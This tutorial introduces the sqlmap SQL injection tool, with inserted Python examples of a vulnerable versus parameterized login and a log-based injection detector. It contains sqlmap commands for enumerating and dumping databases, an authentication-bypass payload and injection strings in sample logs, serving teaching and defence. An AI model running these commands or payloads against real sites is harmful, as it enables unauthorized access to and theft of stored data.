Sqlmap is an open source tool that automates the detection of SQL injection flaws in web applications. Once it finds a vulnerability, sqlmap can exploit it and connect to the database to view, modify or delete tables.
SQL injection is an attack technique that injects SQL code by exploiting a vulnerability in a web application backed by a SQL database. The vulnerability arises from missing validation of the input data the application receives. SQL commands are then injected through the application's own queries into its database, with the aim of authenticating with maximum privileges in protected areas of the site, even without valid credentials, and of reading and altering sensitive data.
Among the SQL injection techniques supported by sqlmap are:
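The missing input control described above, shown beside the fix, as an added example that is not part of the original page: a login check that concatenates user input into the SQL text next to the same check with bound parameters. The in-memory sqlite3 database, the table layout and the payload are all constructed for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed in-memory database with two users (sample data, not from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.execute(
        "INSERT INTO users VALUES ('admin', 's3cret', 'admin'), ('bob', 'hunter2', 'user')"
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement by string concatenation: the inputs become part of the
    SQL text, so quotes and keywords inside them are parsed as SQL."""
    query = (
        "SELECT username, role FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone()


def login_safe(conn, username, password):
    """Same query with bound parameters: the driver passes the inputs as data,
    so nothing the user types can change the structure of the statement."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


def demo():
    """Run both versions with a valid login and with a comment-based payload that
    truncates the WHERE clause after the username in the concatenated version."""
    conn = make_db()
    results = {
        "valid_vuln": login_vulnerable(conn, "bob", "hunter2"),
        "valid_safe": login_safe(conn, "bob", "hunter2"),
        # The vulnerable query becomes: ... WHERE username = 'admin' --' AND password = '...'
        # Everything after "--" is a comment, so the password is never checked.
        "bypass_vuln": login_vulnerable(conn, "admin' --", "anything"),
        # The safe query looks for a user literally named "admin' --" and finds none.
        "bypass_safe": login_safe(conn, "admin' --", "anything"),
    }
    conn.close()
    return results


if __name__ == "__main__":
    for name, row in demo().items():
        print(f"{name}: {row}")
```

The two functions issue the same SELECT; the only difference is whether the inputs travel inside the SQL string or as separate bound values, which is exactly the control the text says is missing.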
- boolean-based blind;
- time-based blind;
- error-based;
- union query-based;
- stacked queries;
- out-of-band.
Its tests can target GET and POST parameters as well as the values of the HTTP Cookie, User-Agent and Referer headers.
GET requests
An example of a sqlmap command testing a GET parameter:
sqlmap -u "http://example.com/?id=1" -p id
Where -u is the URL to scan and -p names the parameter to be tested, here “id”.
POST requests
A POST request may look like this:
sqlmap -u "http://example.com/login.php" --data "user=admin&pass=pass" --method POST
Where the parameters to be tested are “user” and “pass”, sent in the request body with --data.
The --dump option
The --dump option retrieves database contents: database names, table names and the data in the columns:
sqlmap -u "http://example.com/?id=1" -p id --dump -T users
dumps the “users” table (-T option).
-D stands for Database name;
-T stands for Table;
-C stands for Column.
sqlmap -u "http://example.com/?id=1" -p id --dump
dumps everything sqlmap is able to enumerate.
Once we have the database name, we can run sqlmap to list the tables it contains:
sqlmap -u "http://example.com/?id=1" -p id -D example_database_name --dump
The result should list the table names; we can then retrieve the column names of one of the tables found:
sqlmap -u "http://example.com/?id=1" -p id -D example_database_name -T example_table_name --dump
Finally, to see the contents of a column within a table:
sqlmap -u "http://example.com/?id=1" -p id -D example_database_name -T example_table_name -C example_column_name --dump
To see the contents of two or more columns, list them separated by commas:
sqlmap -u "http://example.com/?id=1" -p id -D example_database_name -T example_table_name -C column1,column2,user,password --dump
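From the defender's side, the same two facts the page states, that the tests land in query parameters and in the Cookie, User-Agent and Referer headers, and that a --dump run walks one parameter through many values, are what a web server log shows. The following is an added example, not code from sqlmap or from the original page: it parses constructed access-log lines (a combined-log-like layout with an extra quoted Cookie field, which is an assumption about the log format), flags a tool-style User-Agent, flags injection markers in any of those four locations, and flags a client that drives one parameter through an unusual number of distinct values. The sample lines, IP addresses and User-Agent version string are all constructed.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample traffic (not real logs). Fields: client, timestamp, request line,
# status, bytes, Referer, User-Agent, Cookie. 203.0.113.9 mimics a scanner working on
# the "id" parameter; 198.51.100.5 is ordinary browsing.
SAMPLE_LOG = """\
198.51.100.5 - - [10/May/2024:10:00:00 +0000] "GET /?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0" "session=u1"
203.0.113.9 - - [10/May/2024:10:00:01 +0000] "GET /?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)" "-"
203.0.113.9 - - [10/May/2024:10:00:01 +0000] "GET /?id=1%27 HTTP/1.1" 500 120 "-" "Mozilla/5.0" "-"
203.0.113.9 - - [10/May/2024:10:00:02 +0000] "GET /?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "Mozilla/5.0" "-"
203.0.113.9 - - [10/May/2024:10:00:02 +0000] "GET /?id=1%20AND%201%3D2 HTTP/1.1" 200 300 "-" "Mozilla/5.0" "-"
203.0.113.9 - - [10/May/2024:10:00:03 +0000] "GET /?id=1 HTTP/1.1" 200 512 "http://example.com/?x=1%27%20OR%201%3D1" "Mozilla/5.0" "session=a%27%20AND%20SLEEP(5)"
198.51.100.5 - - [10/May/2024:10:00:04 +0000] "GET /?id=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0" "session=u1"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<cookie>[^"]*)"$'
)

# Markers typical of boolean-, time- and union-based probing. Tune these to the
# application: parameters that legitimately carry words like "or" need tighter patterns.
MARKER_RE = re.compile(
    r"(?i)(\bunion\b[\s\S]{0,40}\bselect\b|\bsleep\s*\(|\bbenchmark\s*\(|"
    r"'\s*(and|or)\b|\b(and|or)\b\s+\d+\s*=\s*\d+)"
)


def parse_line(line):
    """Return the log fields as a dict, or None for a line that does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def cookie_pairs(header):
    """Split a Cookie header into decoded (name, value) pairs."""
    pairs = []
    for chunk in header.split(";"):
        if "=" in chunk:
            k, v = chunk.strip().split("=", 1)
            pairs.append((k, unquote_plus(v)))
    return pairs


def suspicious_inputs(rec):
    """List (location, decoded value) pairs matching an injection marker in the
    places the page names: query parameters, Cookie, User-Agent and Referer."""
    parts = urlsplit(rec["target"])
    candidates = [("param:" + k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    candidates += [("cookie:" + k, v) for k, v in cookie_pairs(rec["cookie"])]
    candidates.append(("referer", unquote_plus(rec["referer"])))
    candidates.append(("user-agent", rec["ua"]))
    return [(loc, val) for loc, val in candidates if MARKER_RE.search(val)]


def analyze(log_text, burst_threshold=4):
    """Return (client, alert kind, detail) tuples for the whole log."""
    alerts = []
    values_seen = defaultdict(set)  # (client, path, parameter) -> distinct values sent
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        # Weakest signal: a scanner can present any User-Agent it likes.
        if "sqlmap" in rec["ua"].lower():
            alerts.append((rec["ip"], "tool-user-agent", rec["ua"]))
        for loc, val in suspicious_inputs(rec):
            alerts.append((rec["ip"], "injection-marker", loc + "=" + val))
        parts = urlsplit(rec["target"])
        for k, v in parse_qsl(parts.query, keep_blank_values=True):
            values_seen[(rec["ip"], parts.path, k)].add(v)
    # Enumeration and dumping send many requests that differ only in one parameter.
    for (ip, path, param), vals in values_seen.items():
        if len(vals) >= burst_threshold:
            alerts.append((ip, "parameter-fuzzing", f"{path}?{param} took {len(vals)} distinct values"))
    return alerts


if __name__ == "__main__":
    for ip, kind, detail in analyze(SAMPLE_LOG):
        print(f"{ip}\t{kind}\t{detail}")
```

The per-request checks catch the individual probes, while the distinct-value count is the signal that survives a renamed User-Agent and encoded payloads; in production the threshold should be set against the parameter's normal value spread and the window should be bounded in time rather than spanning the whole file.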